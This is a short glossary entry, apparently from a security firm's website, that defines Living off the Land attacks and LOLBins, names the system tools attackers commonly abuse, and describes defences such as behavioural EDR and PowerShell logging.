Living off the Land (LotL)
An attack technique that leverages legitimate system tools (PowerShell, WMI, certutil) instead of malware - making detection significantly harder.
What is Living off the Land?
Living off the Land (LotL) is a technique used by advanced attackers that involves leveraging legitimate tools and features already present in the victim’s operating system instead of deploying custom malware. The attacker uses tools such as PowerShell, WMI, PsExec, certutil, mshta, regsvr32 and Bitsadmin to execute subsequent attack phases.
The term LOLBins (Living off the Land Binaries) refers to legitimate Windows (and Linux) system executables that can be abused for offensive purposes. The LOLBAS project (LOLBins, LOLLibs, LOLScripts) documents hundreds of such tools and methods of abuse.
The LotL technique is particularly effective because the tools are already present on the system (nothing needs to be downloaded), they are signed by Microsoft (they do not trigger AV alerts), their use can appear as normal administrative activity and they leave no typical malware traces on disk (fileless attack).
Why does it matter?
Traditional signature-based antivirus systems are ineffective against LotL attacks because there is no malicious file to detect. Detection requires behavioural analysis - monitoring how legitimate tools are being used, not whether they are malicious. EDR with advanced behavioural analysis, PowerShell logging (Script Block Logging), WMI monitoring and threat hunting are key defensive elements against these techniques.
Related topics
Related terms
Related SEQRED services
Need help in this area?
Our experts will help you assess the risk and plan next steps.